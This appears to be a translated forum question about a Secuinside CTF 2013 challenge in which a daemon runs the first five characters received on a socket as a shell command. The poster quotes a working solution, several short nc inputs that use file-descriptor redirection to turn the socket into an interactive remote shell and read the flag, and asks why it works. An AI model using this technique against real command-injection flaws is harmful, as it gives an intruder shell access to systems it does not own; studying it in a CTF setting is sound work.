这个周末,有一场 CTF 兵棋推演,Secuinside CTF 2013 ( http://war.secuinside.com/ )
作为一名计算机安全爱好者,我研究了挑战,以及 CTF 结束后他们的解决方案。
挑战之一是在服务器上获取远程 shell,因为该服务器上正在运行一个名为“givemeshell”的守护程序。守护进程所做的是在选定的端口上保持一个套接字打开,比如说端口 12345。
当套接字接收到某些东西时,守护进程会获取前 5 个字符并在 shell 中启动它们。
例如,如果我 send cat file
,守护程序将cat f
在 shell 中启动命令。没有响应发送,所以我不知道命令的结果。
目标是读取包含标志的文件。
现在,有人给了我这个解决方案:
$ nc 1.2.3.4 12345
4<>a
$ nc 1.2.3.4 12345
sh<&4
sh>&4
cat flag
The flag is _FLAG_
我测试了这个解决方案并且它有效。但是在花了几个小时试图理解它之后,我仍然无法弄清楚它的作用以及它为什么起作用。我知道这是关于重定向某些东西...
有人可以向我解释吗?谢谢!